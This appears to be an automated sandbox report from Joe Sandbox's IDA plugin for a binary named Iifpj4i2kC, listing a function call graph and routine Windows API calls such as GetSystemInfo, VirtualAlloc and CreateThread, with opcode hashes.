30276 7ff67fad3a00 96 API calls 29099 7ff67fa6d16a 119 API calls _swprintf_c_l 30202 7ff67fb01b70 88 API calls 30203 7ff67fa62770 25 API calls 29243 7ff67fa41758 85 API calls 29307 7ff67fafa660 29308 7ff67fafa66d 29307->29308 29315 7ff67fafa67b 29308->29315 29316 7ff67facfe10 85 API calls 29308->29316 30204 7ff67fafab60 87 API calls 30247 7ff67fa4b260 malloc RtlPcToFileHeader RaiseException ISource _swprintf_c_l 30281 7ff67fa59d60 34 API calls 30180 7ff67fa42450 26 API calls 30250 7ff67fa45650 GetLastError SetLastError RtlRestoreContext 30251 7ff67fa76e53 40 API calls _swprintf_c_l 30205 7ff67fa83f50 9 API calls 30282 7ff67fafad40 87 API calls 29678 7ff67fa44740 29708 7ff67fa4b820 FlsAlloc 29678->29708 29680 7ff67fa448e4 29681 7ff67fa4474f 29681->29680 29721 7ff67fa4b6c0 GetModuleHandleExW 29681->29721 29683 7ff67fa44778 29722 7ff67fa45ad0 29683->29722 29685 7ff67fa44780 29685->29680 29730 7ff67fa4cb30 29685->29730 29689 7ff67fa447e7 29692 7ff67fa44822 29689->29692 29693 7ff67fa4ced0 8 API calls 29689->29693 29690 7ff67fa447b1 29690->29680 29690->29689 29760 7ff67fa4ced0 29690->29760 29694 7ff67fa44879 29692->29694 29739 7ff67fa50030 29692->29739 29693->29692 29747 7ff67fa4c3c0 29694->29747 29697 7ff67fa4487e 29697->29680 29763 7ff67fa50470 GetEnabledXStateFeatures GetEnabledXStateFeatures 29697->29763 29699 7ff67fa44896 29700 7ff67fa448aa 29699->29700 29701 7ff67fa448c3 29699->29701 29764 7ff67fa4b980 GetStdHandle WriteFile 29700->29764 29765 7ff67fa4c8a0 29701->29765 29705 7ff67fa448b6 RaiseFailFastException 29705->29701 29709 7ff67fa4b96e 29708->29709 29710 7ff67fa4b840 29708->29710 29709->29681 29767 7ff67fa52750 29710->29767 29715 7ff67fa4ced0 8 API calls 29716 7ff67fa4b872 29715->29716 29717 7ff67fa4b89d GetCurrentProcess GetProcessAffinityMask 29716->29717 29718 7ff67fa4b894 29716->29718 29720 7ff67fa4b908 29716->29720 29717->29718 29719 7ff67fa4b8e4 QueryInformationJobObject 29718->29719 29719->29720 29720->29681 29721->29683 29723 7ff67faaac48 _swprintf_c_l 3 API calls 29722->29723 29724 7ff67fa45ae5 29723->29724 29725 7ff67fa45b24 29724->29725 29942 7ff67fa50860 InitializeCriticalSectionEx 29724->29942 29725->29685 29727 7ff67fa45af2 29727->29725 29728 7ff67fa4c8a0 InitializeCriticalSectionEx 29727->29728 29729 7ff67fa45b1d 29728->29729 29729->29685 29731 7ff67fa4c8a0 InitializeCriticalSectionEx 29730->29731 29732 7ff67fa447a1 29731->29732 29732->29680 29733 7ff67fa440a0 29732->29733 29734 7ff67faaac48 _swprintf_c_l 3 API calls 29733->29734 29735 7ff67fa440be 29734->29735 29736 7ff67fa4415a 29735->29736 29943 7ff67fa42e10 4 API calls 2 library calls 29735->29943 29736->29690 29738 7ff67fa440f0 ISource 29738->29690 29740 7ff67fa5005b 29739->29740 29746 7ff67fa50106 29739->29746 29741 7ff67faaac48 _swprintf_c_l 3 API calls 29740->29741 29742 7ff67fa5007a 29741->29742 29743 7ff67fa4c8a0 InitializeCriticalSectionEx 29742->29743 29744 7ff67fa500a5 29743->29744 29745 7ff67fa500ee GetSystemTimeAsFileTime 29744->29745 29745->29746 29746->29694 29748 7ff67fa4c40c 29747->29748 29750 7ff67fa4c406 29747->29750 29749 7ff67fa4ced0 8 API calls 29748->29749 29749->29750 29944 7ff67fa4c830 29750->29944 29753 7ff67fa4c483 29753->29697 29754 7ff67fa4c45f 29754->29753 29967 7ff67fa45720 29754->29967 29756 7ff67fa4c468 29756->29753 29974 7ff67fa4daf0 29756->29974 29757 7ff67fa4c478 29757->29697 30154 7ff67fa4d0e0 8 API calls 29760->30154 29762 7ff67fa4cef8 29762->29689 29763->29699 29764->29705 29766 7ff67faaa952 InitializeCriticalSectionEx 29765->29766 29913 7ff67fa4c0d0 29767->29913 29769 7ff67fa5276e 29770 7ff67fa4c0d0 8 API calls 29769->29770 29771 7ff67fa5279b 29770->29771 29772 7ff67fa4c0d0 8 API calls 29771->29772 29773 7ff67fa527c3 29772->29773 29774 7ff67fa4c0d0 8 API calls 29773->29774 29775 7ff67fa527eb 29774->29775 29776 7ff67fa4c0d0 8 API calls 29775->29776 29777 7ff67fa52818 29776->29777 29778 7ff67fa4c0d0 8 API calls 29777->29778 29779 7ff67fa52840 29778->29779 29780 7ff67fa4c0d0 8 API calls 29779->29780 29781 7ff67fa5286d 29780->29781 29782 7ff67fa4c0d0 8 API calls 29781->29782 29783 7ff67fa52895 29782->29783 29784 7ff67fa4c0d0 8 API calls 29783->29784 29785 7ff67fa528bd 29784->29785 29786 7ff67fa4c0d0 8 API calls 29785->29786 29787 7ff67fa528e5 29786->29787 29788 7ff67fa4c0d0 8 API calls 29787->29788 29789 7ff67fa52912 29788->29789 29790 7ff67fa4c0d0 8 API calls 29789->29790 29791 7ff67fa5293f 29790->29791 29918 7ff67fa4c1a0 29791->29918 29794 7ff67fa4c1a0 18 API calls 29795 7ff67fa52990 29794->29795 29796 7ff67fa4c1a0 18 API calls 29795->29796 29797 7ff67fa529b9 29796->29797 29798 7ff67fa4c1a0 18 API calls 29797->29798 29799 7ff67fa529e2 29798->29799 29800 7ff67fa4c1a0 18 API calls 29799->29800 29801 7ff67fa52a0b 29800->29801 29802 7ff67fa4c1a0 18 API calls 29801->29802 29803 7ff67fa52a39 29802->29803 29804 7ff67fa4c1a0 18 API calls 29803->29804 29805 7ff67fa52a67 29804->29805 29806 7ff67fa4c1a0 18 API calls 29805->29806 29807 7ff67fa52a90 29806->29807 29808 7ff67fa4c1a0 18 API calls 29807->29808 29809 7ff67fa52ab9 29808->29809 29810 7ff67fa4c1a0 18 API calls 29809->29810 29811 7ff67fa52ae2 29810->29811 29812 7ff67fa4c1a0 18 API calls 29811->29812 29813 7ff67fa52b0b 29812->29813 29814 7ff67fa4c1a0 18 API calls 29813->29814 29815 7ff67fa52b34 29814->29815 29816 7ff67fa4c1a0 18 API calls 29815->29816 29817 7ff67fa52b5d 29816->29817 29818 7ff67fa4c1a0 18 API calls 29817->29818 29819 7ff67fa52b8b 29818->29819 29820 7ff67fa4c1a0 18 API calls 29819->29820 29821 7ff67fa52bb9 29820->29821 29822 7ff67fa4c1a0 18 API calls 29821->29822 29823 7ff67fa52be2 29822->29823 29824 7ff67fa4c1a0 18 API calls 29823->29824 29825 7ff67fa52c0b 29824->29825 29826 7ff67fa4c1a0 18 API calls 29825->29826 29827 7ff67fa52c34 29826->29827 29828 7ff67fa4c1a0 18 API calls 29827->29828 29829 7ff67fa52c5d 29828->29829 29830 7ff67fa4c1a0 18 API calls 29829->29830 29831 7ff67fa52c8b 29830->29831 29832 7ff67fa4c1a0 18 API calls 29831->29832 29833 7ff67fa52cb9 29832->29833 29834 7ff67fa4c1a0 18 API calls 29833->29834 29835 7ff67fa52ce2 29834->29835 29836 7ff67fa4c1a0 18 API calls 29835->29836 29837 7ff67fa52d0b 29836->29837 29838 7ff67fa4c1a0 18 API calls 29837->29838 29839 7ff67fa52d34 29838->29839 29840 7ff67fa4c1a0 18 API calls 29839->29840 29841 7ff67fa52d5d 29840->29841 29842 7ff67fa4c1a0 18 API calls 29841->29842 29843 7ff67fa52d86 29842->29843 29844 7ff67fa4c1a0 18 API calls 29843->29844 29845 7ff67fa52daf 29844->29845 29846 7ff67fa4c1a0 18 API calls 29845->29846 29847 7ff67fa52dd8 29846->29847 29848 7ff67fa4c1a0 18 API calls 29847->29848 29849 7ff67fa52e01 29848->29849 29850 7ff67fa4c1a0 18 API calls 29849->29850 29851 7ff67fa52e2a 29850->29851 29852 7ff67fa4c1a0 18 API calls 29851->29852 29853 7ff67fa52e53 29852->29853 29854 7ff67fa4c1a0 18 API calls 29853->29854 29855 7ff67fa52e7c 29854->29855 29856 7ff67fa4c1a0 18 API calls 29855->29856 29857 7ff67fa52ea5 29856->29857 29858 7ff67fa4c1a0 18 API calls 29857->29858 29859 7ff67fa52ece 29858->29859 29860 7ff67fa4c1a0 18 API calls 29859->29860 29861 7ff67fa52ef7 29860->29861 29862 7ff67fa4c1a0 18 API calls 29861->29862 29863 7ff67fa52f20 29862->29863 29864 7ff67fa4c1a0 18 API calls 29863->29864 29865 7ff67fa52f49 29864->29865 29866 7ff67fa4c1a0 18 API calls 29865->29866 29867 7ff67fa52f72 29866->29867 29868 7ff67fa4c1a0 18 API calls 29867->29868 29869 7ff67fa52f9b 29868->29869 29870 7ff67fa4c1a0 18 API calls 29869->29870 29871 7ff67fa52fc4 29870->29871 29872 7ff67fa4c1a0 18 API calls 29871->29872 29873 7ff67fa52fed 29872->29873 29874 7ff67fa4c1a0 18 API calls 29873->29874 29875 7ff67fa53016 29874->29875 29876 7ff67fa4c1a0 18 API calls 29875->29876 29877 7ff67fa5303f 29876->29877 29878 7ff67fa4c1a0 18 API calls 29877->29878 29879 7ff67fa53068 29878->29879 29880 7ff67fa4c1a0 18 API calls 29879->29880 29881 7ff67fa53096 29880->29881 29882 7ff67fa4c1a0 18 API calls 29881->29882 29883 7ff67fa530c4 29882->29883 29884 7ff67fa4c1a0 18 API calls 29883->29884 29885 7ff67fa530f2 29884->29885 29886 7ff67fa4c1a0 18 API calls 29885->29886 29887 7ff67fa53120 29886->29887 29888 7ff67fa4c1a0 18 API calls 29887->29888 29889 7ff67fa5314e 29888->29889 29890 7ff67fa4c1a0 18 API calls 29889->29890 29891 7ff67fa5317c 29890->29891 29892 7ff67fa4c1a0 18 API calls 29891->29892 29893 7ff67fa531a5 29892->29893 29894 7ff67fa4c1a0 18 API calls 29893->29894 29895 7ff67fa531d3 29894->29895 29896 7ff67fa4c1a0 18 API calls 29895->29896 29897 7ff67fa531fc 29896->29897 29898 7ff67fa4c1a0 18 API calls 29897->29898 29899 7ff67fa53225 29898->29899 29900 7ff67fa4c1a0 18 API calls 29899->29900 29901 7ff67fa4b845 29900->29901 29902 7ff67fa51460 GetSystemInfo 29901->29902 29903 7ff67fa514a4 29902->29903 29904 7ff67fa514a8 GetNumaHighestNodeNumber 29903->29904 29905 7ff67fa514ce GetCurrentProcess GetProcessGroupAffinity 29903->29905 29904->29905 29906 7ff67fa514b7 29904->29906 29907 7ff67fa514f9 GetLastError 29905->29907 29908 7ff67fa51504 29905->29908 29906->29905 29907->29908 29909 7ff67fa51526 29908->29909 29941 7ff67fa51240 GetLogicalProcessorInformationEx GetLastError GetLogicalProcessorInformationEx ISource 29908->29941 29911 7ff67fa51590 GetCurrentProcess GetProcessAffinityMask 29909->29911 29912 7ff67fa4b84a 29909->29912 29911->29912 29912->29709 29912->29715 29914 7ff67fa4c0f4 29913->29914 29915 7ff67fa4c0f8 29914->29915 29916 7ff67fa4ced0 8 API calls 29914->29916 29915->29769 29917 7ff67fa4c124 29916->29917 29917->29769 29919 7ff67fa4c1ca 29918->29919 29920 7ff67fa4c2df 29918->29920 29921 7ff67fa4c1d7 strcmp 29919->29921 29922 7ff67fa4c1ef 29919->29922 29923 7ff67fa4ced0 8 API calls 29920->29923 29921->29922 29929 7ff67fa4c1e7 29921->29929 29925 7ff67fa4c1fc strcmp 29922->29925 29926 7ff67fa4c20f 29922->29926 29924 7ff67fa4c2f6 29923->29924 29924->29929 29940 7ff67fa4d050 _stricmp strtoull 29924->29940 29925->29926 29925->29929 29927 7ff67fa4c21c strcmp 29926->29927 29928 7ff67fa4c22f 29926->29928 29927->29928 29927->29929 29930 7ff67fa4c23c strcmp 29928->29930 29931 7ff67fa4c24f 29928->29931 29929->29794 29930->29929 29930->29931 29933 7ff67fa4c25c strcmp 29931->29933 29934 7ff67fa4c273 29931->29934 29933->29929 29933->29934 29935 7ff67fa4c297 29934->29935 29936 7ff67fa4c280 strcmp 29934->29936 29937 7ff67fa4c2bb 29935->29937 29938 7ff67fa4c2a4 strcmp 29935->29938 29936->29929 29936->29935 29937->29920 29939 7ff67fa4c2c8 strcmp 29937->29939 29938->29929 29938->29937 29939->29920 29939->29929 29940->29929 29941->29909 29942->29727 29943->29738 29981 7ff67fa53d70 29944->29981 29946 7ff67fa4c44b 29946->29753 29947 7ff67fa59340 29946->29947 29948 7ff67fa50130 4 API calls 29947->29948 29949 7ff67fa59355 29948->29949 29990 7ff67fa51650 QueryPerformanceFrequency 29949->29990 29951 7ff67fa5935a 29954 7ff67fa593fc 29951->29954 29991 7ff67fa51010 29951->29991 29953 7ff67fa59442 29953->29754 29954->29953 29958 7ff67fa594e9 29954->29958 30029 7ff67fa51200 9 API calls 29954->30029 29956 7ff67fa59527 29956->29958 30030 7ff67fa51200 9 API calls 29956->30030 29966 7ff67fa59598 ISource 29958->29966 30005 7ff67fa71560 29958->30005 29960 7ff67fa59634 29961 7ff67faaac48 _swprintf_c_l 3 API calls 29960->29961 29960->29966 29962 7ff67fa5969a 29961->29962 29962->29966 30031 7ff67fa50c50 29962->30031 29964 7ff67fa596bd 29964->29966 30036 7ff67fa6fdd0 16 API calls _swprintf_c_l 29964->30036 29966->29754 29968 7ff67fa45732 29967->29968 29969 7ff67fa4576d 29968->29969 30134 7ff67fa50700 CreateEventW 29968->30134 29969->29756 29971 7ff67fa45744 29971->29969 30135 7ff67fa4ba80 CreateThread 29971->30135 29973 7ff67fa45763 29973->29756 29975 7ff67fa4db07 29974->29975 29976 7ff67fa4db0f 29975->29976 29977 7ff67faaac48 _swprintf_c_l 3 API calls 29975->29977 29976->29757 29979 7ff67fa4db41 29977->29979 29980 7ff67fa4dbd5 ISource 29979->29980 30138 7ff67fa541d0 29979->30138 29980->29757 29986 7ff67fa54aa0 29981->29986 29984 7ff67fa53daf 29984->29946 29987 7ff67faaac48 _swprintf_c_l 3 API calls 29986->29987 29988 7ff67fa53d98 29987->29988 29988->29984 29989 7ff67fa565d0 malloc RtlPcToFileHeader RaiseException _swprintf_c_l 29988->29989 29989->29984 29990->29951 29992 7ff67fa51048 GetCurrentProcess IsProcessInJob 29991->29992 29993 7ff67fa51045 29991->29993 29994 7ff67fa51079 29992->29994 29995 7ff67fa51120 29992->29995 29993->29992 29994->29995 29996 7ff67fa51083 QueryInformationJobObject 29994->29996 29997 7ff67fa51159 29995->29997 29998 7ff67fa51130 GlobalMemoryStatusEx 29995->29998 29996->29995 29999 7ff67fa510a5 29996->29999 30000 7ff67fa5116c 29997->30000 30001 7ff67fa51179 GlobalMemoryStatusEx 29997->30001 29998->29997 29999->29995 30002 7ff67fa510e9 GlobalMemoryStatusEx 29999->30002 30037 7ff67faaacf0 8 API calls 2 library calls 30000->30037 30001->30000 30002->29995 30004 7ff67fa511bb 30004->29954 30006 7ff67fa7157d 30005->30006 30038 7ff67fa516a0 VirtualAlloc 30006->30038 30008 7ff67fa715a3 30009 7ff67fa715f6 30008->30009 30115 7ff67fa51440 InitializeCriticalSection 30008->30115 30041 7ff67fa51440 InitializeCriticalSection 30009->30041 30012 7ff67fa71602 30013 7ff67fa71a28 30012->30013 30042 7ff67fa82260 30012->30042 30013->29960 30015 7ff67fa71631 _swprintf_c_l 30028 7ff67fa7186f 30015->30028 30052 7ff67fa71260 30015->30052 30017 7ff67fa71804 30056 7ff67fa517b0 30017->30056 30019 7ff67fa7183e 30019->30028 30059 7ff67fa71a50 30019->30059 30021 7ff67fa71860 30022 7ff67fa71864 30021->30022 30024 7ff67fa71893 30021->30024 30116 7ff67fa51790 VirtualFree 30022->30116 30024->30028 30077 7ff67fa84e60 30024->30077 30028->29960 30029->29956 30030->29958 30032 7ff67faaac48 _swprintf_c_l 3 API calls 30031->30032 30033 7ff67fa50c76 30032->30033 30034 7ff67fa50c7e CreateEventW 30033->30034 30035 7ff67fa50ca0 ISource 30033->30035 30034->30035 30035->29964 30036->29966 30037->30004 30039 7ff67fa516d9 30038->30039 30040 7ff67fa516c1 VirtualFree 30038->30040 30039->30008 30040->30008 30041->30012 30043 7ff67fa8228f 30042->30043 30044 7ff67fa822bc 30043->30044 30045 7ff67fa822b2 30043->30045 30051 7ff67fa822e7 30043->30051 30047 7ff67fa517b0 3 API calls 30044->30047 30117 7ff67fa51830 18 API calls 30045->30117 30049 7ff67fa822cd 30047->30049 30048 7ff67fa822ba 30048->30049 30049->30051 30118 7ff67fa51790 VirtualFree 30049->30118 30051->30015 30054 7ff67fa7127f 30052->30054 30055 7ff67fa7129c 30054->30055 30119 7ff67fa50d10 GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation ISource 30054->30119 30055->30017 30057 7ff67fa517f4 GetCurrentProcess VirtualAllocExNuma 30056->30057 30058 7ff67fa517d5 VirtualAlloc 30056->30058 30057->30019 30058->30057 30060 7ff67fa71a85 30059->30060 30061 7ff67fa71a89 30060->30061 30064 7ff67fa71aa3 30060->30064 30120 7ff67faaacf0 8 API calls 2 library calls 30061->30120 30063 7ff67fa71a9b 30063->30021 30065 7ff67fa71ae3 EnterCriticalSection 30064->30065 30066 7ff67fa71b61 30064->30066 30067 7ff67fa71b10 LeaveCriticalSection 30064->30067 30068 7ff67fa516e0 3 API calls 30064->30068 30069 7ff67fa71c19 LeaveCriticalSection 30064->30069 30072 7ff67fa71bef 30064->30072 30065->30064 30065->30067 30121 7ff67faaacf0 8 API calls 2 library calls 30066->30121 30067->30064 30068->30064 30074 7ff67fa71c25 30069->30074 30071 7ff67fa71be7 30071->30021 30073 7ff67fa71bf8 EnterCriticalSection 30072->30073 30072->30074 30073->30069 30074->30066 30076 7ff67fa71c5d EnterCriticalSection LeaveCriticalSection 30074->30076 30122 7ff67fa51770 VirtualFree 30074->30122 30076->30074 30123 7ff67fa84da0 30077->30123 30080 7ff67fa70c50 30084 7ff67fa70c75 30080->30084 30081 7ff67fa70cdb 30082 7ff67fa71225 30081->30082 30083 7ff67fa71231 30081->30083 30114 7ff67fa711ae 30081->30114 30132 7ff67fa50bb0 CloseHandle 30082->30132 30086 7ff67fa7123a 30083->30086 30087 7ff67fa71246 30083->30087 30084->30081 30089 7ff67fa50c50 4 API calls 30084->30089 30133 7ff67fa50bb0 CloseHandle 30086->30133 30087->30028 30090 7ff67fa70d1b 30089->30090 30090->30081 30091 7ff67fa50c50 4 API calls 30090->30091 30092 7ff67fa70d31 _swprintf_c_l 30091->30092 30092->30081 30093 7ff67fa50e30 10 API calls 30092->30093 30094 7ff67fa71050 30093->30094 30095 7ff67fa50c50 4 API calls 30094->30095 30096 7ff67fa710cd 30095->30096 30097 7ff67fa7110f 30096->30097 30098 7ff67fa50c50 4 API calls 30096->30098 30097->30081 30099 7ff67fa711dd 30097->30099 30100 7ff67fa711d1 30097->30100 30101 7ff67fa710e3 30098->30101 30103 7ff67fa711e6 30099->30103 30104 7ff67fa711f2 30099->30104 30128 7ff67fa50bb0 CloseHandle 30100->30128 30101->30097 30127 7ff67fa50bd0 4 API calls 2 library calls 30101->30127 30129 7ff67fa50bb0 CloseHandle 30103->30129 30106 7ff67fa711fb 30104->30106 30107 7ff67fa71207 30104->30107 30130 7ff67fa50bb0 CloseHandle 30106->30130 30107->30081 30108 7ff67fa71210 30107->30108 30131 7ff67fa50bb0 CloseHandle 30108->30131 30112 7ff67fa710f9 30112->30097 30113 7ff67fa50c50 4 API calls 30112->30113 30113->30097 30114->30028 30115->30009 30116->30028 30117->30048 30118->30051 30119->30055 30120->30063 30121->30071 30122->30074 30124 7ff67fa84db9 30123->30124 30126 7ff67fa71a07 30123->30126 30125 7ff67fa84dd0 GetEnabledXStateFeatures 30124->30125 30124->30126 30125->30126 30126->30080 30127->30112 30128->30099 30129->30104 30130->30107 30131->30081 30132->30083 30133->30087 30134->29971 30136 7ff67fa4bab5 SetThreadPriority ResumeThread CloseHandle 30135->30136 30137 7ff67fa4baaf 30135->30137 30136->29973 30137->29973 30140 7ff67fa54203 _swprintf_c_l 30138->30140 30139 7ff67fa54229 ISource _swprintf_c_l 30139->29979 30140->30139 30144 7ff67fa55180 30140->30144 30142 7ff67fa54220 30142->30139 30143 7ff67fa4c8a0 InitializeCriticalSectionEx 30142->30143 30143->30139 30145 7ff67fa517b0 3 API calls 30144->30145 30146 7ff67fa551a2 30145->30146 30147 7ff67fa551aa 30146->30147 30148 7ff67fa516e0 3 API calls 30146->30148 30147->30142 30149 7ff67fa551c8 30148->30149 30152 7ff67fa551d3 _swprintf_c_l 30149->30152 30153 7ff67fa51790 VirtualFree 30149->30153 30151 7ff67fa552ee 30151->30142 30152->30142 30153->30151 30154->29762 30283 7ff67fa43540 6 API calls 30284 7ff67fad31b0 91 API calls 29100 7ff67fad8fb0 29101 7ff67fad8fea 29100->29101 29102 7ff67fad9017 GetLocaleInfoEx 29101->29102 29103 7ff67fad9036 29102->29103 29105 7ff67fad9048 29103->29105 29106 7ff67fac40f0 85 API calls 29103->29106 29106->29105 30181 7ff67fa5dcb5 6 API calls 30209 7ff67fa7a7b0 39 API calls 30210 7ff67fa56fb0 WaitForSingleObject 29238 7ff67fa418b2 29239 7ff67faf7360 29238->29239 29240 7ff67fa418c8 29238->29240 29239->29240 29242 7ff67fafd620 85 API calls 29239->29242 29242->29240 30253 7ff67fa582b0 SleepEx SwitchToThread SwitchToThread 30256 7ff67fad6aa0 98 API calls 29492 7ff67fa456a0 29493 7ff67fa42ce0 9 API calls 29492->29493 29494 7ff67fa456b2 29493->29494 29495 7ff67fa456ee SetEvent 29494->29495 29498 7ff67faf3840 29495->29498 29499 7ff67fa454e0 16 API calls 29498->29499 29500 7ff67faf3861 29499->29500 29505 7ff67fae27c0 29500->29505 29503 7ff67faf3866 29510 7ff67fa45800 WaitForSingleObjectEx 29503->29510 29511 7ff67fa457d0 SetEvent 29503->29511 29512 7ff67fae2890 29505->29512 29509 7ff67fae27d4 29509->29503 29510->29503 29511->29503 29513 7ff67fa417fc 85 API calls 29512->29513 29515 7ff67fae28af 29513->29515 29514 7ff67fae27cf 29529 7ff67fa417fc 29514->29529 29515->29514 29516 7ff67fae28db CoInitializeEx 29515->29516 29517 7ff67fae28f2 29516->29517 29518 7ff67fae2900 29517->29518 29519 7ff67fae28f6 29517->29519 29518->29514 29533 7ff67fae2970 85 API calls 29518->29533 29519->29514 29521 7ff67fae294a 29519->29521 29534 7ff67fa41fc0 71 API calls 29519->29534 29536 7ff67fa41fc0 71 API calls 29521->29536 29524 7ff67fae2937 29535 7ff67fa42540 26 API calls 29524->29535 29525 7ff67fae2956 29537 7ff67fa42540 26 API calls 29525->29537 29530 7ff67fa41812 29529->29530 29530->29509 29532 7ff67faf736d 29530->29532 29538 7ff67fafd620 85 API calls 29530->29538 29532->29509 29533->29514 29534->29524 29536->29525 29538->29532 30211 7ff67fa43fa0 28 API calls _swprintf_c_l 30217 7ff67fb05390 71 API calls 30218 7ff67fad7f90 13 API calls 30219 7ff67fa74390 13 API calls 2 library calls 30288 7ff67fa6498e 10 API calls 30220 7ff67fa4bb90 14 API calls 30261 7ff67fafaa80 86 API calls 30292 7ff67fa53580 24 API calls _swprintf_c_l 30263 7ff67fa5a280 ResetEvent

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA5146F
                                                                                                                                                                        • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514AD
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514D9
                                                                                                                                                                        • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514EA
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514F9
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA51590
                                                                                                                                                                        • GetProcessAffinityMask.KERNEL32 ref: 00007FF67FA515A3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 580471860-0
                                                                                                                                                                        • Opcode ID: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
                                                                                                                                                                        • Instruction ID: 231ce6c3222e11548c8cee0177279e693f0ee4f534f7b9584dd6117f92f8f41e
                                                                                                                                                                        • Opcode Fuzzy Hash: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E515B73A28B46C6EA408F19E8409BA77A5FF45B94F844131D94ECB765EF3CE485C780
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BreakDebug
                                                                                                                                                                        • String ID: END
                                                                                                                                                                        • API String ID: 456121617-2522575163
                                                                                                                                                                        • Opcode ID: 32de57e1a6750bfde0c47b7a68c88ed3004110d39829c2a4e75dfd4f32f0a8f4
                                                                                                                                                                        • Instruction ID: d2633ea4cede74edfb7ef20b5886df36a535396e3ba3e04d19d555e6d30545d9
                                                                                                                                                                        • Opcode Fuzzy Hash: 32de57e1a6750bfde0c47b7a68c88ed3004110d39829c2a4e75dfd4f32f0a8f4
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B827873E29B46C6FA508B29A850A7633A0AF56F94F144236E95DC73A0EF3CF451C780
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3168844106-0
